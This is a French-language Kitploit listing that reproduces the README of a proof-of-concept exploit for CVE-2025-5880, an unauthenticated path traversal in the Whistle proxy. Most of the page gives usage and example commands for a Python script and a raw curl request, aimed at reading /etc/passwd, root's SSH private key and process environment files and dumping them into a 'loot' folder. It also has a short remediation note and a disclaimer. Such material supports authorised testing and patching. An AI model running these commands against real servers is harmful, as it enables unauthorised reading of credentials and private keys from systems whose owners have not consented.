Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-5880-PoC — Exploit de preuve de concept pour une vulnérabilité de traversée de chemin non authentifiée dans Whistle v2.9.98. | Kitploit
Outils/GitHubGitHub/yacine-rm/cve-2025-5880-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubyacine-rm/cve-2025-5880-poc

CVE-2025-5880-PoC

Exploit de preuve de concept pour une vulnérabilité de traversée de chemin non authentifiée dans Whistle v2.9.98.

Voir le dépôt
12il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-5880 — Preuve de concept (PoC) de traversée de chemins dans Whistle 2.9.98

Python CVE CWE License

Exploit de preuve de concept pour une vulnérabilité de traversée de chemins non authentifiée dans Whistle v2.9.98.


Résumé de la vulnérabilité

ChampDétail
Identifiant CVECVE-2025-5880
CWECWE-22 (Traversée de chemins)
Logiciel affectéWhistle ≤ 2.9.98
Point d'accès affecté/cgi-bin/sessions/get-temp-file
Vecteur d'attaqueRéseau — aucune authentification requise
ImpactLecture arbitraire de fichiers sur le système de fichiers hôte

Le paramètre de requête filename n'est pas nettoyé avant d'être utilisé pour ouvrir un fichier sur le disque, permettant à un attaquant de sortir du répertoire de fichiers temporaires prévu et de lire tout fichier auquel le processus Whistle a l'autorisation d'accéder (ex. /etc/passwd, /root/.ssh/id_rsa).


Démarrage rapide

root@kitploit:~
# Clone
git clone https://github.com/YourHandle/CVE-2025-5880
cd CVE-2025-5880
 
# Aucune dépendance externe
python3 CVE-2025-5880.py -u http://TARGET:8899 --preset passwd

Utilisation

root@kitploit:~
python3 CVE-2025-5880.py [-h] -u URL [-f FILE] [--preset PRESET]
                          [--sweep] [-o OUTPUT] [--save-dir DIR]
                          [--timeout N]
OptionDescription
-u / --urlURL de base de la cible (ex. http://192.168.1.10:8899)
-f / --fileChemin de fichier arbitraire à lire
--presetRaccourci nommé : passwd shadow hosts id_rsa …
--sweepParcourir tous les préréglages automatiquement
-o / --outputEnregistrer le résultat dans un fichier
--save-dirRépertoire pour déverser le butin de --sweep
--timeoutDélai d'attente HTTP en secondes (par défaut 10)

Exemples

root@kitploit:~
# Lire /etc/passwd
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset passwd
 
# Récupérer la clé privée SSH de root
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset id_rsa -o id_rsa.pem
 
# Lire un chemin arbitraire
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 -f /proc/self/environ
 
# Parcourir et sauvegarder tous les préréglages
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --sweep --save-dir ./loot

PoC brut (curl)

root@kitploit:~
# /etc/passwd
curl -s "http://TARGET:8899/cgi-bin/sessions/get-temp-file?filename=/etc/passwd" | jq -r '.value'

Correction

Mettez à jour Whistle vers une version qui valide et restreint le paramètre filename au répertoire de fichiers temporaires prévu. Appliquez une normalisation de chemin par liste blanche (ex. path.resolve + vérification de préfixe) côté serveur.


Avertissement

Cet outil est fourni uniquement à des fins de tests de sécurité autorisés et d'éducation.
L'utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique.
L'auteur décline toute responsabilité en cas d'utilisation abusive.

Télécharger l’outil